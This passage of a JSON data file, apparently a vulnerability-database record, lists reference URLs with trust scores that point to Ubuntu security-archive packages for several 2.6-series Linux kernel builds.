        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.68_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.60.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.83_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.68_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-386_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-20.58.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.83_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.68_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.83_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305-ec2_2.6.31-305.13_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-20.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-powerpc64-smp_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-server_2.6.31-20.58_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.68_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-20.58.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-305-ec2_2.6.31-305.13_i386.deb"
      },
      {
        "trust": 0.1,
